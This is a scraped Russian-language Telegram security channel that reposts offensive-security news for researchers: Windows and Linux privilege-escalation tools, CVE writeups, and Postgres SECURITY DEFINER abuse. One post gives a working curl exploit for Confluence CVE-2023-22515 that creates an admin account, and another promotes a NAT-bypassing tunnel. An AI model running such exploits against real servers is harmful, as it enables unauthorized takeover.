Forwarded from APT
🥔 Coerced Potato
New tool for local privilege escalation on a Windows machine, from a service account to NT SYSTEM. Should work on any recent versions of Windows.
⚙️ Tool:
https://github.com/hackvens/CoercedPotato
📝 Research:
https://blog.hackvens.fr/articles/CoercedPotato.html
#windows #lpe #seimpersonateprivilege #potato
New tool for local privilege escalation on a Windows machine, from a service account to NT SYSTEM. Should work on any recent versions of Windows.
⚙️ Tool:
https://github.com/hackvens/CoercedPotato
📝 Research:
https://blog.hackvens.fr/articles/CoercedPotato.html
#windows #lpe #seimpersonateprivilege #potato
🔥7👍2❤1
Forwarded from SHADOW:Group
📝 Немного про шаблоны для BCheck
Решил на днях собрать свою коллекцию шаблонов для BCheck. Если вдруг еще не познакомились с этим функционалом в Burp Suite, то вот неплохая статья, чтобы быстро вкатиться.
И дыбы не выдумывать велосипед, решил посмотреть уже готовые шаблоны в открытом доступе и, к моему счастью, нашелся репозиторий, в котором уже собрана целая подборка.
Бегло прошерстив ее, выделил для себя примерный план того, что нужно написать самостоятельно, а что можно позаимствовать или внести небольшие коррективы.
Например шаблон, для Blind SSRF смотрит только параметры
Ссылка на GitHub
#web #tools #burp
Решил на днях собрать свою коллекцию шаблонов для BCheck. Если вдруг еще не познакомились с этим функционалом в Burp Suite, то вот неплохая статья, чтобы быстро вкатиться.
И дыбы не выдумывать велосипед, решил посмотреть уже готовые шаблоны в открытом доступе и, к моему счастью, нашелся репозиторий, в котором уже собрана целая подборка.
Бегло прошерстив ее, выделил для себя примерный план того, что нужно написать самостоятельно, а что можно позаимствовать или внести небольшие коррективы.
Например шаблон, для Blind SSRF смотрит только параметры
url и proxy. Мы же в свою очередь можем добавить и другие популярные параметры и повысить свои шансы на успех. Или, например, добавить больше проверок в шаблон для crlf. В общем, проявите фантазию и однажды это принесет свои плоды.Ссылка на GitHub
#web #tools #burp
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
1-Click RCE on GNOME (CVE-2023-43641)
#RCE #linux #gnome #cve
Сегодня, в сотрудничестве с Ильей Липницким, Лаборатория безопасности GitHub раскрывает CVE-2023-43641, уязвимость memory corruption в libcue. Мы также отправили текстовую версию этой записи в список oss-security list.
🖥 Статья | 🛡 Дневник Безопасника
#RCE #linux #gnome #cve
Сегодня, в сотрудничестве с Ильей Липницким, Лаборатория безопасности GitHub раскрывает CVE-2023-43641, уязвимость memory corruption в libcue. Мы также отправили текстовую версию этой записи в список oss-security list.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🆒1
root with a single command: sudo logrotate
#LPE #linux
Сценарий таков: на совершенно новом сервере Ubuntu 22.04 есть учетная запись, которая для которой прописано:
🔥 Статья | 🛡 Дневник Безопасника
#LPE #linux
Сценарий таков: на совершенно новом сервере Ubuntu 22.04 есть учетная запись, которая для которой прописано:
sudo logrotate *. Сможем ли мы получить root? Короткий ответ: Да. Автор не смог найти в Интернете интересной информации о подобной эксплуатации logrotate, поэтому давайте изучим подробнее.Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Forwarded from Proxy Bar
CVE-2023-22515
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
login - adm1n/adm1n
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action login - adm1n/adm1n
❤8👍1
Похек
root with a single command: sudo logrotate #LPE #linux Сценарий таков: на совершенно новом сервере Ubuntu 22.04 есть учетная запись, которая для которой прописано: sudo logrotate *. Сможем ли мы получить root? Короткий ответ: Да. Автор не смог найти в Интернете…
вдогонку Github репа с другим PoC
CVE-2023-22515: Confluence Broken Access Control Exploit
#confluence #cve #BAC
Данный скрипт предназначен для эксплуатации уязвимости CVE-2023-22515 в Confluence, которая позволяет получить несанкционированный доступ к экземплярам Confluence Server и Confluence Data Center. Уязвимость относится к категории Broken Access Control и имеет базовую оценку CVSS 10.0. ⚠️
https://github.com/Chocapikk/CVE-2023-22515
🛡 Дневник Безопасника
CVE-2023-22515: Confluence Broken Access Control Exploit
#confluence #cve #BAC
Данный скрипт предназначен для эксплуатации уязвимости CVE-2023-22515 в Confluence, которая позволяет получить несанкционированный доступ к экземплярам Confluence Server и Confluence Data Center. Уязвимость относится к категории Broken Access Control и имеет базовую оценку CVSS 10.0. ⚠️
https://github.com/Chocapikk/CVE-2023-22515
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Chocapikk/CVE-2023-22515: CVE-2023-22515: Confluence Broken Access Control Exploit
CVE-2023-22515: Confluence Broken Access Control Exploit - Chocapikk/CVE-2023-22515
❤7🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
bore
#cli #rust
Современный, простой TCP-туннель на языке Rust, который открывает локальные порты для удаленного сервера, обходя стандартные брандмауэры NAT-соединений. Это все, что он делает: не больше и не меньше. По сути тот же duckdns, но без регистрации.
Установка:
💻 Github Repo | 🛡 Дневник Безопасника
#cli #rust
Современный, простой TCP-туннель на языке Rust, который открывает локальные порты для удаленного сервера, обходя стандартные брандмауэры NAT-соединений. Это все, что он делает: не больше и не меньше. По сути тот же duckdns, но без регистрации.
Установка:
cargo install bore-cli
для MacOSbrew install bore-cliИспользование:
bore local 8000 --to bore.pubТакже вы можете использовать его, как сервер, но зачем?... Мы не ради этого собрались тут)
bore server
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6🔥1
Вчера выступал с докладом в МИРЭА. Спасибо Кибхак, что пригласили меня! В конце презентации был кейс, нужно было предложить самые интересные векторы атак. Ребята, которые предлагали самые интересные способы, я раздал мерч от себя, которые собирал на конференциях. Куча стикеров, мерч Яндекса, Касперский, Bizone, Positive Technologies, Солар и так далее.
Спасибо всем тем, кто пришел послушать нас!)
#МИРЭА #доклад
Спасибо всем тем, кто пришел послушать нас!)
#МИРЭА #доклад
👍27🔥6❤5🆒1
CVE-2023-34039-main.zip
126.9 KB
VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
#CVE #RCE
#CVE #RCE
⚡4
Forwarded from BePractical
Hi everyone! I've created a new video on Prototype Pollution which covers:
-> What is Prototype Pollution?
-> Why it happens?
-> Demonstration
Check it out: https://www.youtube.com/watch?v=FLpnEfrP-yE
-> What is Prototype Pollution?
-> Why it happens?
-> Demonstration
Check it out: https://www.youtube.com/watch?v=FLpnEfrP-yE
YouTube
BUG BOUNTY: UNDERSTANDING PROTOTYPE POLLUTION VULNERABILITY | 2023
Note: This video is only for educational purpose.
Hi everyone! This video demonstrates the process of finding prototype pollution in web applications
Website: https://bepractical.tech
Previous Video: https://www.youtube.com/watch?v=aCqJD5gzHPo
Hacking…
Hi everyone! This video demonstrates the process of finding prototype pollution in web applications
Website: https://bepractical.tech
Previous Video: https://www.youtube.com/watch?v=aCqJD5gzHPo
Hacking…
👍7
Rust Burn Library for Deep Learning
#rust #ML #machinelearning
Burn представляет собой новый фреймворк глубокого обучения, полностью написанный на языке программирования Rust. Основная цель создания этого фреймворка вместо использования существующих, таких как PyTorch или TensorFlow, заключается в создании универсального инструмента, который бы идеально подходил различным пользователям, включая исследователей, инженеров по машинному обучению и инженеров программного обеспечения низкого уровня.
🔥 Статья про Burn | 💻 Github Repo | |🛡 Дневник Безопасника
#rust #ML #machinelearning
Burn представляет собой новый фреймворк глубокого обучения, полностью написанный на языке программирования Rust. Основная цель создания этого фреймворка вместо использования существующих, таких как PyTorch или TensorFlow, заключается в создании универсального инструмента, который бы идеально подходил различным пользователям, включая исследователей, инженеров по машинному обучению и инженеров программного обеспечения низкого уровня.
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6❤2👾2
Новый вид DDoS-атаки HTTP/2 Rapid Reset. Что это и почему вам нужно знать о ней?
#http2
Статья описывает новый вид DDoS-атаки, затронувшей сервисы Google. Такие атаки отличаются увеличенным масштабом и основаны на быстром сбросе потоков протокола HTTP/2. Здесь мы разбираем варианты атаки Rapid Reset и меры смягчения, а также предлагаем стратегии для минимизации рисков.
⚡️ Статья на Habr | 🛡 Дневник Безопасника
#http2
Статья описывает новый вид DDoS-атаки, затронувшей сервисы Google. Такие атаки отличаются увеличенным масштабом и основаны на быстром сбросе потоков протокола HTTP/2. Здесь мы разбираем варианты атаки Rapid Reset и меры смягчения, а также предлагаем стратегии для минимизации рисков.
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Новый вид DDoS-атаки HTTP/2 Rapid Reset. Что это и почему вам нужно знать о ней?
Статья описывает новый вид DDoS-атаки, затронувшей сервисы Google. Такие атаки отличаются увеличенным масштабом и основаны на быстром сбросе потоков протокола HTTP/2. Здесь мы разбираем варианты атаки Rapid Reset и меры смягчения, а также предлагаем стратегии…
👍5🆒2
Forwarded from burpsuite (not official)
This media is not supported in your browser
VIEW IN TELEGRAM
⚡5❤3
burpsuite (not official)
RCE of Burp Scanner / Crawler via Clickjacking https://hackerone.com/reports/1274695
срочно обновляем свои бурпсьутики 😁
🫡8👀3
Forwarded from Нарыл (Pavel Sorokin)
Postgres Privilege Escalation
Тут неожиданно выстрелила старая тема с повышение в Postgres, напомню о ней.
В Postgres функция может быть определена с двумя типами исполнения SECURITY INVOKER (по умолчанию) и SECURITY DEFINER. Функции первого типа выполняются с правами текущего пользователя, вторые же выполняются с правами того, кто создал функцию. По сути аналог SUID бита.
Также в Postgres есть конфигурация search_path, она определяет в каком порядке Postgres обходит имеющиеся схемы в поиске функций и операторов, если схема не указана явна.
И если при определении функции с SECURITY DEFINER не указан также search_path, применяемый внутри этой функции, то атакующий с низкими правами может переопределить функцию или оператор, который применяется в функции с SECURITY DEFINER, что приведет к выполнению его функции или оператора с правами создателя функции. Если это пользователь postgres, то можно получить права SUPERUSER или добавить себе право исполнения команд ОС pg_execute_server_program.
Подробнее с примерами по ссылке
На мой взгляд практически полная аналогия с классическим повышением привилегий в Linux, когда приложение с SUID битом, делает что-то типа
Тут неожиданно выстрелила старая тема с повышение в Postgres, напомню о ней.
В Postgres функция может быть определена с двумя типами исполнения SECURITY INVOKER (по умолчанию) и SECURITY DEFINER. Функции первого типа выполняются с правами текущего пользователя, вторые же выполняются с правами того, кто создал функцию. По сути аналог SUID бита.
Также в Postgres есть конфигурация search_path, она определяет в каком порядке Postgres обходит имеющиеся схемы в поиске функций и операторов, если схема не указана явна.
И если при определении функции с SECURITY DEFINER не указан также search_path, применяемый внутри этой функции, то атакующий с низкими правами может переопределить функцию или оператор, который применяется в функции с SECURITY DEFINER, что приведет к выполнению его функции или оператора с правами создателя функции. Если это пользователь postgres, то можно получить права SUPERUSER или добавить себе право исполнения команд ОС pg_execute_server_program.
Подробнее с примерами по ссылке
На мой взгляд практически полная аналогия с классическим повышением привилегий в Linux, когда приложение с SUID битом, делает что-то типа
system("cat file"), при этом не сбрасывая переменную PATH.CYBERTEC PostgreSQL | Services & Support
Abusing SECURITY DEFINER functions in PostgreSQL
UPDATED Aug. 2023: How SECURITY DEFINER PostgreSQL functions can be abused for privilege escalation attacks and how you can protect yorself.
❤5
В честь этого события у меня запланировал ребрендинг канала. Что это значит? Будет новое название канала. Дизайнер нарисовал новое лого. Будет создан новый стиль канала. Будет мерч!
Поменяю ли я ход развития канала, контент или уйду из ИБ? Нет! Контент по ходу моего развития будет становиться лучше. Можете сами сравнить, как было и как стало.
Немного цифр:
За 2 года активного ведения канала на канале было опубликовано более 3.000 постов! Канал помогает в налаживании контактов с компаниями, вузами и комьюнити.
Буду благодарен коллегам-админам за распространение информации об изменениях канала!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23👍7🎉4❤3🥰3❤🔥2